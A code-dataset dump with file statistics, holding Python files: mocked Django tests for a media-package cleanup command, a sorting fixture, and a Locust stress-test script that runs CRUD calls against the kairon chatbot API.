] | 10 | 2017-09-06T02:36:01.000Z | 2020-09-15T20:13:33.000Z | # pylint: disable=wildcard-import
import sys
from os.path import join
from .utils import PROJECT_PATH
sys.path.append(PROJECT_PATH)
sys.path.append(join(PROJECT_PATH, 'apps'))
| 19.777778 | 43 | 0.792135 | 28 | 178 | 4.928571 | 0.464286 | 0.23913 | 0.202899 | 0.26087 | 0.347826 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.101124 | 178 | 8 | 44 | 22.25 | 0.8625 | 0.174157 | 0 | 0 | 0 | 0 | 0.027586 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.6 | 0 | 0.6 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
b0ad482a374263ed7799954041702eb55b748035 | 7,467 | py | Python | src/backend/marsha/core/tests/test_command_clean_mediapackages.py | insad/marsha | 3c6627b9a1debbb594e43233df7b7edb88f57f45 | [
"MIT"
] | 64 | 2018-04-26T23:46:14.000Z | 2022-03-26T21:32:23.000Z | src/backend/marsha/core/tests/test_command_clean_mediapackages.py | insad/marsha | 3c6627b9a1debbb594e43233df7b7edb88f57f45 | [
"MIT"
] | 533 | 2018-04-17T10:17:24.000Z | 2022-03-31T13:07:49.000Z | src/backend/marsha/core/tests/test_command_clean_mediapackages.py | insad/marsha | 3c6627b9a1debbb594e43233df7b7edb88f57f45 | [
"MIT"
] | 16 | 2018-09-21T12:52:34.000Z | 2021-11-29T16:44:51.000Z | """Tests for clean_mediapackages command."""
from io import StringIO
from unittest import mock
from django.core.management import call_command
from django.test import TestCase
from ..management.commands import clean_mediapackages
class CleanMediapackagesTest(TestCase):
"""Test clean_mediapackages command."""
@mock.patch.object(clean_mediapackages, "list_indexed_medialive_channels")
@mock.patch.object(clean_mediapackages, "list_mediapackage_channels")
def test_clean_mediapackages_no_mediapackage(
self, mock_mediapackage_channels, mock_medialive_indexed_channels
):
"""Command should do nothing when there is no mediapackage to process."""
out = StringIO()
mock_mediapackage_channels.return_value = []
mock_medialive_indexed_channels.return_value = {}
call_command("clean_mediapackages", stdout=out)
self.assertEqual("", out.getvalue())
out.close()
@mock.patch.object(clean_mediapackages, "list_indexed_medialive_channels")
@mock.patch.object(clean_mediapackages, "list_mediapackage_channels")
def test_clean_mediapackages_related_medialive(
self, mock_mediapackage_channels, mock_medialive_indexed_channels
):
"""Command should do nothing when there is related medialives."""
out = StringIO()
mock_mediapackage_channels.return_value = [{"Id": "MP1"}, {"Id": "MP2"}]
mock_medialive_indexed_channels.return_value = {
"MP1": {"Id": "ML1", "Name": "MP1"},
"MP2": {"Id": "ML2", "Name": "MP2"},
}
call_command("clean_mediapackages", stdout=out)
self.assertIn("Processing mediapackage channel MP1", out.getvalue())
self.assertIn("Processing mediapackage channel MP2", out.getvalue())
self.assertNotIn("Mediapackage channel MP1 deleted", out.getvalue())
self.assertNotIn("Mediapackage channel MP2 deleted", out.getvalue())
out.close()
@mock.patch.object(clean_mediapackages, "list_mediapackage_channel_harvest_jobs")
@mock.patch.object(clean_mediapackages, "list_indexed_medialive_channels")
@mock.patch.object(clean_mediapackages, "list_mediapackage_channels")
def test_clean_mediapackages_harvest_job_pending(
self,
mock_mediapackage_channels,
mock_medialive_indexed_channels,
mock_harvest_jobs,
):
"""Command should do nothing when there is a pending harvest job."""
out = StringIO()
mock_mediapackage_channels.return_value = [{"Id": "MP1"}]
mock_medialive_indexed_channels.return_value = {}
mock_harvest_jobs.return_value = [{"Status": "PENDING"}]
call_command("clean_mediapackages", stdout=out)
self.assertIn("Processing mediapackage channel MP1", out.getvalue())
self.assertNotIn("Mediapackage channel MP1 deleted", out.getvalue())
out.close()
@mock.patch.object(clean_mediapackages, "delete_mediapackage_channel")
@mock.patch.object(clean_mediapackages, "list_mediapackage_channel_harvest_jobs")
@mock.patch.object(clean_mediapackages, "list_mediapackage_channels")
@mock.patch.object(clean_mediapackages, "list_indexed_medialive_channels")
def test_clean_mediapackages_harvest_job_failed(
self,
mock_medialive_indexed_channels,
mock_mediapackage_channels,
mock_harvest_jobs,
mock_delete_mediapackage,
):
"""Command should delete channel when only a failed harvest job exists."""
out = StringIO()
mock_mediapackage_channels.return_value = [{"Id": "MP1"}]
mock_medialive_indexed_channels.return_value = {}
mock_harvest_jobs.return_value = [{"Status": "FAILED"}]
mock_delete_mediapackage.return_value = ["EP1", "EP2"]
call_command("clean_mediapackages", stdout=out)
self.assertIn("Processing mediapackage channel MP1", out.getvalue())
self.assertIn("Mediapackage channel endpoint EP1 deleted", out.getvalue())
self.assertIn("Mediapackage channel endpoint EP2 deleted", out.getvalue())
self.assertIn("Mediapackage channel MP1 deleted", out.getvalue())
out.close()
@mock.patch.object(clean_mediapackages, "list_mediapackage_channel_harvest_jobs")
@mock.patch.object(clean_mediapackages, "list_indexed_medialive_channels")
@mock.patch.object(clean_mediapackages, "list_mediapackage_channels")
def test_clean_mediapackages_harvest_jobs_failed_and_pending(
self,
mock_mediapackage_channels,
mock_medialive_indexed_channels,
mock_harvest_jobs,
):
"""Command should do nothing when failed and pending harvest job exists."""
out = StringIO()
mock_mediapackage_channels.return_value = [{"Id": "MP1"}]
mock_medialive_indexed_channels.return_value = {}
mock_harvest_jobs.return_value = [
{"Status": "FAILED"},
{"Status": "PENDING"},
]
call_command("clean_mediapackages", stdout=out)
self.assertIn("Processing mediapackage channel MP1", out.getvalue())
self.assertNotIn("Mediapackage channel MP1 deleted", out.getvalue())
out.close()
@mock.patch.object(clean_mediapackages, "list_mediapackage_channel_harvest_jobs")
@mock.patch.object(clean_mediapackages, "list_indexed_medialive_channels")
@mock.patch.object(clean_mediapackages, "list_mediapackage_channels")
def test_clean_mediapackages_harvest_jobs_pending_and_failed(
self,
mock_mediapackage_channels,
mock_medialive_indexed_channels,
mock_harvest_jobs,
):
"""Command should do nothing when pending and failed harvest job exists."""
out = StringIO()
mock_mediapackage_channels.return_value = [{"Id": "MP1"}]
mock_medialive_indexed_channels.return_value = {}
mock_harvest_jobs.return_value = [
{"Status": "PENDING"},
{"Status": "FAILED"},
]
call_command("clean_mediapackages", stdout=out)
self.assertIn("Processing mediapackage channel MP1", out.getvalue())
self.assertNotIn("Mediapackage channel MP1 deleted", out.getvalue())
out.close()
@mock.patch.object(clean_mediapackages, "delete_mediapackage_channel")
@mock.patch.object(clean_mediapackages, "list_mediapackage_channel_harvest_jobs")
@mock.patch.object(clean_mediapackages, "list_indexed_medialive_channels")
@mock.patch.object(clean_mediapackages, "list_mediapackage_channels")
def test_clean_mediapackages_no_harvest_job(
self,
mock_mediapackage_channels,
mock_medialive_indexed_channels,
mock_harvest_jobs,
mock_delete_mediapackage,
):
"""Command should delete channel when no harvest job exists."""
out = StringIO()
mock_mediapackage_channels.return_value = [{"Id": "MP1"}]
mock_medialive_indexed_channels.return_value = {}
mock_harvest_jobs.return_value = []
mock_delete_mediapackage.return_value = ["EP1", "EP2"]
call_command("clean_mediapackages", stdout=out)
self.assertIn("Processing mediapackage channel MP1", out.getvalue())
self.assertIn("Mediapackage channel endpoint EP1 deleted", out.getvalue())
self.assertIn("Mediapackage channel endpoint EP2 deleted", out.getvalue())
self.assertIn("Mediapackage channel MP1 deleted", out.getvalue())
out.close()
| 43.923529 | 85 | 0.706174 | 798 | 7,467 | 6.289474 | 0.090226 | 0.136282 | 0.062762 | 0.083682 | 0.901574 | 0.88942 | 0.867105 | 0.840606 | 0.836621 | 0.814306 | 0 | 0.005796 | 0.191241 | 7,467 | 169 | 86 | 44.183432 | 0.825302 | 0.070979 | 0 | 0.8 | 0 | 0 | 0.226527 | 0.09331 | 0 | 0 | 0 | 0 | 0.140741 | 1 | 0.051852 | false | 0 | 0.037037 | 0 | 0.096296 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
b0e743ee9fb27bd3fec3d1879f3cd28a9736ae75 | 98 | py | Python | sorting/fixtures.py | gcvalderrama/python_foundations | 5ac045085dcc6c906729b481f833fa6a7889bd19 | [
"MIT"
] | null | null | null | sorting/fixtures.py | gcvalderrama/python_foundations | 5ac045085dcc6c906729b481f833fa6a7889bd19 | [
"MIT"
] | null | null | null | sorting/fixtures.py | gcvalderrama/python_foundations | 5ac045085dcc6c906729b481f833fa6a7889bd19 | [
"MIT"
] | null | null | null |
def basic_array():
return [19, 2, 31, 45, 30, 11, 121, 27], [2, 11, 19, 27, 30, 31, 45, 121]
| 24.5 | 77 | 0.530612 | 20 | 98 | 2.55 | 0.6 | 0.156863 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.432432 | 0.244898 | 98 | 3 | 78 | 32.666667 | 0.256757 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0 | 0 | 0.5 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 8 |
c6aff0602c3a485028b4d6e20b7fc55239e094b8 | 36,593 | py | Python | stress_test/kairon_stress_test.py | Shashank411/kairon | 8a3a083136d8cf89359021e49a7610509772ca9b | [
"Apache-2.0"
] | 97 | 2020-08-18T10:07:48.000Z | 2022-03-26T18:33:37.000Z | stress_test/kairon_stress_test.py | Shashank411/kairon | 8a3a083136d8cf89359021e49a7610509772ca9b | [
"Apache-2.0"
] | 276 | 2020-08-27T23:24:35.000Z | 2022-03-31T09:43:30.000Z | stress_test/kairon_stress_test.py | Shashank411/kairon | 8a3a083136d8cf89359021e49a7610509772ca9b | [
"Apache-2.0"
] | 46 | 2020-09-11T13:29:41.000Z | 2022-03-08T12:27:17.000Z | import inspect
import logging
import os
from locust import HttpUser, between, SequentialTaskSet, task
from locust.exception import StopUser
from mongoengine import connect, disconnect
from rasa.shared.utils.io import read_config_file
from smart_config import ConfigLoader
from stress_test.data_objects import User, Bot, Account
USER_INDEX = 1
class ExecuteTask(SequentialTaskSet):
"""
Load test for kairon.
locust -f stress_test/kairon_stress_test.py --headless -u 1000 -r 100 --host=http://localhost:8080
u: number of users
r: rate at which users are spawned
host: base url where requests are hit
headless: run with CLI only
To run from UI:
locust -f stress_test/kairon_stress_test.py -u 1000 -r 100 --host=http://localhost:8080
"""
wait_time = between(1, 2)
@task
class Register(SequentialTaskSet):
"""
Task to register user.
"""
@task
def register(self):
request_body = {
"email": self.user.email,
"first_name": self.user.first_name,
"last_name": self.user.last_name,
"password": self.user.password,
"confirm_password": self.user.password,
"account": self.user.account,
"bot": self.user.bot,
}
with self.client.post("/api/account/registration",
json=request_body,
catch_response=True) as response:
if response.text is None or not response.text.strip():
logging.error(inspect.stack()[0][3] + " Failed: response is None")
response.failure(inspect.stack()[0][3] + " Failed: response is None")
else:
logging.info(inspect.stack()[0][3] + ": " + response.text)
response_data = response.json()
if not response_data["success"]:
logging.error(inspect.stack()[0][3] + " Failed: " + response_data['message'])
response.failure(inspect.stack()[0][3] + " Failed: " + response_data['message'])
self.interrupt()
@task
class Login(SequentialTaskSet):
"""
Task for user login.
"""
@task
def login(self):
header = {"username": self.user.username, "password": self.user.password}
with self.client.post("/api/auth/login",
data=header,
catch_response=True) as response:
if response.text is None or not response.text.strip():
logging.error(inspect.stack()[0][3] + " Failed: response is None")
response.failure(inspect.stack()[0][3] + " Failed: response is None")
else:
logging.info(inspect.stack()[0][3] + ": " + response.text)
response_data = response.json()
if not response_data["success"]:
logging.error(inspect.stack()[0][3] + " Failed: " + response_data['message'])
response.failure(inspect.stack()[0][3] + " Failed: " + response_data['message'])
else:
self.user.auth_token = response_data["data"]["token_type"] + " " + response_data["data"][
"access_token"]
self.interrupt()
@task
class HttpAction(SequentialTaskSet):
"""
Task to add/get/update/delete http action.
"""
@task
def add_http_action(self):
request_body = {
"intent": "slap",
"auth_token": "bearer dfiuhdfishifoshfoishnfoshfnsifjfs",
"action_name": "action_" + self.user.username,
"response": "string",
"http_url": "http://www.google.com",
"request_method": "GET",
"http_params_list": [{
"key": "testParam1",
"parameter_type": "value",
"value": "testValue1"
}]
}
with self.client.post("/api/bot/action/httpaction",
json=request_body,
headers={"Authorization": self.user.auth_token},
catch_response=True) as response:
if response.text is None or not response.text.strip():
logging.error(inspect.stack()[0][3] + " Failed: response is None")
response.failure(inspect.stack()[0][3] + " Failed: response is None")
else:
logging.info(inspect.stack()[0][3] + ": " + response.text)
response_data = response.json()
if not response_data["success"]:
logging.error(inspect.stack()[0][3] + " Failed: " + response_data['message'])
response.failure(inspect.stack()[0][3] + " Failed: " + response_data['message'])
@task
def get_http_action(self):
with self.client.get("/api/bot/action/httpaction/action_" + self.user.username,
headers={"Authorization": self.user.auth_token},
catch_response=True) as response:
if response.text is None or not response.text.strip():
logging.error(inspect.stack()[0][3] + " Failed: response is None")
response.failure(inspect.stack()[0][3] + " Failed: response is None")
else:
logging.info(inspect.stack()[0][3] + ": " + response.text)
response_data = response.json()
if not response_data["success"]:
logging.error(inspect.stack()[0][3] + " Failed: " + response_data['message'])
response.failure(inspect.stack()[0][3] + " Failed: " + response_data['message'])
@task
def update_http_action(self):
request_body = {
"intent": "greet_test_update_http_action",
"auth_token": "",
"action_name": "action_" + self.user.username,
"response": "",
"http_url": "http://www.google.com",
"request_method": "GET",
"http_params_list": [{
"key": "testParam1",
"parameter_type": "value",
"value": "testValue1"
}]
}
with self.client.put("/api/bot/action/httpaction",
json=request_body,
headers={"Authorization": self.user.auth_token},
catch_response=True) as response:
if response.text is None or not response.text.strip():
logging.error(inspect.stack()[0][3] + " Failed: response is None")
response.failure(inspect.stack()[0][3] + " Failed: response is None")
else:
logging.info(inspect.stack()[0][3] + ": " + response.text)
response_data = response.json()
if not response_data["success"]:
logging.error(inspect.stack()[0][3] + " Failed: " + response_data['message'])
response.failure(inspect.stack()[0][3] + " Failed: " + response_data['message'])
@task
def delete_http_action(self):
with self.client.delete("/api/bot/action/httpaction/action_" + self.user.username,
headers={"Authorization": self.user.auth_token},
catch_response=True) as response:
if response.text is None or not response.text.strip():
logging.error(inspect.stack()[0][3] + " Failed: response is None")
response.failure(inspect.stack()[0][3] + " Failed: response is None")
else:
logging.info(inspect.stack()[0][3] + ": " + response.text)
response_data = response.json()
if not response_data["success"]:
logging.error(inspect.stack()[0][3] + " Failed: " + response_data['message'])
response.failure(inspect.stack()[0][3] + " Failed: " + response_data['message'])
self.interrupt()
@task
class Intents(SequentialTaskSet):
"""
Task to add/get/update/delete intents.
"""
@task
def add_intents(self):
with self.client.post("/api/bot/intents",
json={"data": "happier"},
headers={"Authorization": self.user.auth_token},
catch_response=True) as response:
if response.text is None or not response.text.strip():
logging.error(inspect.stack()[0][3] + " Failed: response is None")
response.failure(inspect.stack()[0][3] + " Failed: response is None")
else:
logging.info(inspect.stack()[0][3] + ": " + response.text)
response_data = response.json()
if not response_data["success"]:
logging.error(inspect.stack()[0][3] + " Failed: " + response_data['message'])
response.failure(inspect.stack()[0][3] + " Failed: " + response_data['message'])
@task
def get_intents(self):
with self.client.get("/api/bot/intents",
headers={"Authorization": self.user.auth_token},
catch_response=True) as response:
if response.text is None or not response.text.strip():
logging.error(inspect.stack()[0][3] + " Failed: response is None")
response.failure(inspect.stack()[0][3] + " Failed: response is None")
else:
logging.info(inspect.stack()[0][3] + ": " + response.text)
response_data = response.json()
if not response_data["success"]:
logging.error(inspect.stack()[0][3] + " Failed: " + response_data['message'])
response.failure(inspect.stack()[0][3] + " Failed: " + response_data['message'])
@task
def delete_intent(self):
with self.client.delete("/api/bot/intents/happier/True",
headers={"Authorization": self.user.auth_token},
catch_response=True) as response:
if response.text is None or not response.text.strip():
logging.error(inspect.stack()[0][3] + " Failed: response is None")
response.failure(inspect.stack()[0][3] + " Failed: response is None")
else:
logging.info(inspect.stack()[0][3] + ": " + response.text)
response_data = response.json()
if not response_data["success"]:
logging.error(inspect.stack()[0][3] + " Failed: " + response_data['message'])
response.failure(inspect.stack()[0][3] + " Failed: " + response_data['message'])
self.interrupt()
@task
class TrainingExamples(SequentialTaskSet):
"""
Task to add/get/update/delete training examples.
"""
@task
def add_training_example(self):
with self.client.post("/api/bot/training_examples/greet",
json={"data": ["How do you do?"]},
headers={"Authorization": self.user.auth_token},
catch_response=True) as response:
if response.text is None or not response.text.strip():
logging.error(inspect.stack()[0][3] + " Failed: response is None")
response.failure(inspect.stack()[0][3] + " Failed: response is None")
else:
logging.info(inspect.stack()[0][3] + ": " + response.text)
response_data = response.json()
if not response_data["success"]:
logging.error(inspect.stack()[0][3] + " Failed: " + response_data['message'])
response.failure(inspect.stack()[0][3] + " Failed: " + response_data['message'])
@task
def get_training_example(self):
with self.client.get("/api/bot/training_examples/greet",
headers={"Authorization": self.user.auth_token},
catch_response=True) as response:
if response.text is None or not response.text.strip():
logging.error(inspect.stack()[0][3] + " Failed: response is None")
response.failure(inspect.stack()[0][3] + " Failed: response is None")
else:
logging.info(inspect.stack()[0][3] + ": " + response.text)
response_data = response.json()
if not response_data["success"]:
logging.error(inspect.stack()[0][3] + " Failed: " + response_data['message'])
response.failure(inspect.stack()[0][3] + " Failed: " + response_data['message'])
@task
def update_training_example(self):
with self.client.get("/api/bot/training_examples/greet",
headers={"Authorization": self.user.auth_token},
catch_response=True) as training_examples:
if training_examples.text is None or not training_examples.text.strip():
logging.error(inspect.stack()[0][3] + " Failed: response is None")
training_examples.failure(inspect.stack()[0][3] + " Failed: response is None")
else:
logging.info(inspect.stack()[0][3] + ": " + training_examples.text)
response_data = training_examples.json()
if not response_data["success"]:
logging.error(inspect.stack()[0][3] + " Failed: " + response_data['message'])
training_examples.failure(inspect.stack()[0][3] + " Failed: " + response_data['message'])
return
with self.client.put("/api/bot/training_examples/greet/" + response_data["data"][0]["_id"],
json={"data": "hey, there"},
headers={"Authorization": self.user.auth_token},
catch_response=True) as response:
if response.text is None or not response.text.strip():
logging.error(inspect.stack()[0][3] + " Failed: response is None")
response.failure(inspect.stack()[0][3] + " Failed: response is None")
else:
logging.info(inspect.stack()[0][3] + ": " + response.text)
response_data = response.json()
if not response_data["success"]:
logging.error(inspect.stack()[0][3] + " Failed: " + response_data['message'])
response.failure(inspect.stack()[0][3] + " Failed: " + response_data['message'])
@task
def delete_training_example(self):
with self.client.get("/api/bot/training_examples/greet",
headers={"Authorization": self.user.auth_token},
catch_response=True) as training_examples:
if training_examples.text is None or not training_examples.text.strip():
logging.error(inspect.stack()[0][3] + " Failed: response is None")
training_examples.failure(inspect.stack()[0][3] + " Failed: response is None")
else:
logging.info(inspect.stack()[0][3] + ": " + training_examples.text)
response_data = training_examples.json()
if not response_data["success"]:
logging.error(inspect.stack()[0][3] + " Failed: " + response_data['message'])
training_examples.failure(inspect.stack()[0][3] + " Failed: " + response_data['message'])
return
with self.client.delete("/api/bot/training_examples",
json={"data": response_data["data"][0]["_id"]},
headers={"Authorization": self.user.auth_token},
catch_response=True) as response:
if response.text is None or not response.text.strip():
logging.error(inspect.stack()[0][3] + " Failed: response is None")
response.failure(inspect.stack()[0][3] + " Failed: response is None")
else:
logging.info(inspect.stack()[0][3] + ": " + response.text)
response_data = response.json()
if not response_data["success"]:
logging.error(inspect.stack()[0][3] + " Failed: " + response_data['message'])
response.failure(inspect.stack()[0][3] + " Failed: " + response_data['message'])
self.interrupt()
@task
class Responses(SequentialTaskSet):
"""
Task to add/get/update/delete responses.
"""
@task
def add_response(self):
with self.client.post("/api/bot/response/utter_greet",
json={"data": "Wow! How are you?"},
headers={"Authorization": self.user.auth_token},
catch_response=True) as response:
if response.text is None or not response.text.strip():
logging.error(inspect.stack()[0][3] + " Failed: response is None")
response.failure(inspect.stack()[0][3] + " Failed: response is None")
else:
logging.info(inspect.stack()[0][3] + ": " + response.text)
response_data = response.json()
if not response_data["success"]:
logging.error(inspect.stack()[0][3] + " Failed: " + response_data['message'])
response.failure(inspect.stack()[0][3] + " Failed: " + response_data['message'])
@task
def get_response(self):
with self.client.get("/api/bot/response/utter_greet",
headers={"Authorization": self.user.auth_token},
catch_response=True) as response:
if response.text is None or not response.text.strip():
logging.error(inspect.stack()[0][3] + " Failed: response is None")
response.failure(inspect.stack()[0][3] + " Failed: response is None")
else:
logging.info(inspect.stack()[0][3] + ": " + response.text)
response_data = response.json()
if not response_data["success"]:
logging.error(inspect.stack()[0][3] + " Failed: " + response_data['message'])
response.failure(inspect.stack()[0][3] + " Failed: " + response_data['message'])
@task
def update_response(self):
with self.client.get("/api/bot/response/utter_greet",
headers={"Authorization": self.user.auth_token},
catch_response=True) as training_examples:
if training_examples.text is None or not training_examples.text.strip():
logging.error(inspect.stack()[0][3] + " Failed: response is None")
training_examples.failure(inspect.stack()[0][3] + " Failed: response is None")
else:
logging.info(inspect.stack()[0][3] + ": " + training_examples.text)
response_data = training_examples.json()
if not response_data["success"]:
logging.error(inspect.stack()[0][3] + " Failed: " + response_data['message'])
training_examples.failure(inspect.stack()[0][3] + " Failed: " + response_data['message'])
with self.client.put("/api/bot/response/utter_greet/" + response_data["data"][0]["_id"],
json={"data": "Hello, How are you!"},
headers={"Authorization": self.user.auth_token},
catch_response=True) as response:
if response.text is None or not response.text.strip():
logging.error(inspect.stack()[0][3] + " Failed: response is None")
response.failure(inspect.stack()[0][3] + " Failed: response is None")
else:
logging.info(inspect.stack()[0][3] + ": " + response.text)
response_data = response.json()
if not response_data["success"]:
logging.error(inspect.stack()[0][3] + " Failed: " + response_data['message'])
response.failure(inspect.stack()[0][3] + " Failed: " + response_data['message'])
@task
def delete_response(self):
with self.client.get("/api/bot/response/utter_greet",
headers={"Authorization": self.user.auth_token},
catch_response=True) as training_examples:
if training_examples.text is None or not training_examples.text.strip():
logging.error(inspect.stack()[0][3] + " Failed: response is None")
training_examples.failure(inspect.stack()[0][3] + " Failed: response is None")
else:
logging.info(inspect.stack()[0][3] + ": " + training_examples.text)
response_data = training_examples.json()
if not response_data["success"]:
logging.error(inspect.stack()[0][3] + " Failed: " + response_data['message'])
training_examples.failure(inspect.stack()[0][3] + " Failed: " + response_data['message'])
with self.client.delete("/api/bot/response",
json={"data": response_data["data"][0]["_id"]},
headers={"Authorization": self.user.auth_token},
catch_response=True) as response:
if response.text is None or not response.text.strip():
logging.error(inspect.stack()[0][3] + " Failed: response is None")
response.failure(inspect.stack()[0][3] + " Failed: response is None")
else:
logging.info(inspect.stack()[0][3] + ": " + response.text)
response_data = response.json()
if not response_data["success"]:
logging.error(inspect.stack()[0][3] + " Failed: " + response_data['message'])
response.failure(inspect.stack()[0][3] + " Failed: " + response_data['message'])
self.interrupt()
@task
class Stories(SequentialTaskSet):
"""
Task to add/get/update/delete stories.
"""
@task
def add_story(self):
request = {
"name": "test_path",
"events": [
{"name": "greet", "type": "user"},
{"name": "utter_greet", "type": "action"},
],
}
with self.client.post("/api/bot/stories",
json=request,
headers={"Authorization": self.user.auth_token},
catch_response=True) as response:
if response.text is None or not response.text.strip():
logging.error(inspect.stack()[0][3] + " Failed: response is None")
response.failure(inspect.stack()[0][3] + " Failed: response is None")
else:
logging.info(inspect.stack()[0][3] + ": " + response.text)
response_data = response.json()
if not response_data["success"]:
logging.error(inspect.stack()[0][3] + " Failed: " + response_data['message'])
response.failure(inspect.stack()[0][3] + " Failed: " + response_data['message'])
@task
def get_story(self):
with self.client.get("/api/bot/stories",
headers={"Authorization": self.user.auth_token},
catch_response=True) as response:
if response.text is None or not response.text.strip():
logging.error(inspect.stack()[0][3] + " Failed: response is None")
response.failure(inspect.stack()[0][3] + " Failed: response is None")
else:
logging.info(inspect.stack()[0][3] + ": " + response.text)
response_data = response.json()
if not response_data["success"]:
logging.error(inspect.stack()[0][3] + " Failed: " + response_data['message'])
response.failure(inspect.stack()[0][3] + " Failed: " + response_data['message'])
@task
def get_utterance_from_intent(self):
with self.client.get("/api/bot/utterance_from_intent/greet",
headers={"Authorization": self.user.auth_token},
catch_response=True) as response:
if response.text is None or not response.text.strip():
logging.error(inspect.stack()[0][3] + " Failed: response is None")
response.failure(inspect.stack()[0][3] + " Failed: response is None")
else:
logging.info(inspect.stack()[0][3] + ": " + response.text)
response_data = response.json()
if not response_data["success"]:
logging.error(inspect.stack()[0][3] + " Failed: " + response_data['message'])
response.failure(inspect.stack()[0][3] + " Failed: " + response_data['message'])
self.interrupt()
@task
class Endpoint(SequentialTaskSet):
"""
Task to add/get endpoints.
"""
@task
def set_endpoint(self):
with self.client.put("/api/bot/endpoint",
json={"bot_endpoint": {"url": "http://localhost:5005/"},
"action_endpoint": {"url": "http://localhost:5000/"},
"tracker_endpoint": {"url": "mongodb://localhost:27017", "db": "rasa"}},
headers={"Authorization": self.user.auth_token},
catch_response=True) as response:
if response.text is None or not response.text.strip():
logging.error(inspect.stack()[0][3] + " Failed: response is None")
response.failure(inspect.stack()[0][3] + " Failed: response is None")
else:
logging.info(inspect.stack()[0][3] + ": " + response.text)
response_data = response.json()
if not response_data["success"]:
logging.error(inspect.stack()[0][3] + " Failed: " + response_data['message'])
response.failure(inspect.stack()[0][3] + " Failed: " + response_data['message'])
@task
def get_endpoint(self):
with self.client.get("/api/bot/endpoint",
headers={"Authorization": self.user.auth_token},
catch_response=True) as response:
if response.text is None or not response.text.strip():
logging.error(inspect.stack()[0][3] + " Failed: response is None")
response.failure(inspect.stack()[0][3] + " Failed: response is None")
else:
logging.info(inspect.stack()[0][3] + ": " + response.text)
response_data = response.json()
if not response_data["success"]:
logging.error(inspect.stack()[0][3] + " Failed: " + response_data['message'])
response.failure(inspect.stack()[0][3] + " Failed: " + response_data['message'])
self.interrupt()
@task
class Configurations(SequentialTaskSet):
"""
Task to add/get configurations.
"""
@task
def set_config(self):
with self.client.put("/api/bot/config",
json=read_config_file('./template/config/default.yml'),
headers={"Authorization": self.user.auth_token},
catch_response=True) as response:
if response.text is None or not response.text.strip():
logging.error(inspect.stack()[0][3] + " Failed: response is None")
response.failure(inspect.stack()[0][3] + " Failed: response is None")
else:
logging.info(inspect.stack()[0][3] + ": " + response.text)
response_data = response.json()
if not response_data["success"]:
logging.error(inspect.stack()[0][3] + " Failed: " + response_data['message'])
response.failure(inspect.stack()[0][3] + " Failed: " + response_data['message'])
@task
def get_config(self):
with self.client.get("/api/bot/config",
headers={"Authorization": self.user.auth_token},
catch_response=True) as response:
if response.text is None or not response.text.strip():
logging.error(inspect.stack()[0][3] + " Failed: response is None")
response.failure(inspect.stack()[0][3] + " Failed: response is None")
else:
logging.info(inspect.stack()[0][3] + ": " + response.text)
response_data = response.json()
if not response_data["success"]:
logging.error(inspect.stack()[0][3] + " Failed: " + response_data['message'])
response.failure(inspect.stack()[0][3] + " Failed: " + response_data['message'])
self.interrupt()
@task
class Templates(SequentialTaskSet):
"""
Task to add/get templates.
"""
@task
def set_templates(self):
with self.client.post("/api/bot/templates/use-case",
json={"data": "Hi-Hello"},
headers={"Authorization": self.user.auth_token},
catch_response=True) as response:
if response.text is None or not response.text.strip():
logging.error(inspect.stack()[0][3] + " Failed: response is None")
response.failure(inspect.stack()[0][3] + " Failed: response is None")
else:
logging.info(inspect.stack()[0][3] + ": " + response.text)
response_data = response.json()
if not response_data["success"]:
logging.error(inspect.stack()[0][3] + " Failed: " + response_data['message'])
response.failure(inspect.stack()[0][3] + " Failed: " + response_data['message'])
@task
def get_templates(self):
with self.client.get("/api/bot/templates/use-case",
headers={"Authorization": self.user.auth_token},
catch_response=True) as response:
if response.text is None or not response.text.strip():
logging.error(inspect.stack()[0][3] + " Failed: response is None")
response.failure(inspect.stack()[0][3] + " Failed: response is None")
else:
logging.info(inspect.stack()[0][3] + ": " + response.text)
response_data = response.json()
if not response_data["success"]:
logging.error(inspect.stack()[0][3] + " Failed: " + response_data['message'])
response.failure(inspect.stack()[0][3] + " Failed: " + response_data['message'])
@task
def set_config_templates(self):
with self.client.post("/api/bot/templates/config",
json={"data": "default"},
headers={"Authorization": self.user.auth_token},
catch_response=True) as response:
if response.text is None or not response.text.strip():
logging.error(inspect.stack()[0][3] + " Failed: response is None")
response.failure(inspect.stack()[0][3] + " Failed: response is None")
else:
logging.info(inspect.stack()[0][3] + ": " + response.text)
response_data = response.json()
if not response_data["success"]:
logging.error(inspect.stack()[0][3] + " Failed: " + response_data['message'])
response.failure(inspect.stack()[0][3] + " Failed: " + response_data['message'])
@task
def get_config_templates(self):
with self.client.get("/api/bot/templates/config",
headers={"Authorization": self.user.auth_token},
catch_response=True) as response:
if response.text is None or not response.text.strip():
logging.error(inspect.stack()[0][3] + " Failed: response is None")
response.failure(inspect.stack()[0][3] + " Failed: response is None")
else:
logging.info(inspect.stack()[0][3] + ": " + response.text)
response_data = response.json()
if not response_data["success"]:
logging.error(inspect.stack()[0][3] + " Failed: " + response_data['message'])
response.failure(inspect.stack()[0][3] + " Failed: " + response_data['message'])
raise StopUser()
class KaironUser(HttpUser):
"""
Test user.
"""
tasks = [ExecuteTask]
wait_time = between(1, 2)
auth_token = None
username = None
email = None
first_name = None
last_name = None
password = None
account = None
bot = None
def on_start(self):
global USER_INDEX
os.environ["system_file"] = "./tests/testing_data/system.yaml"
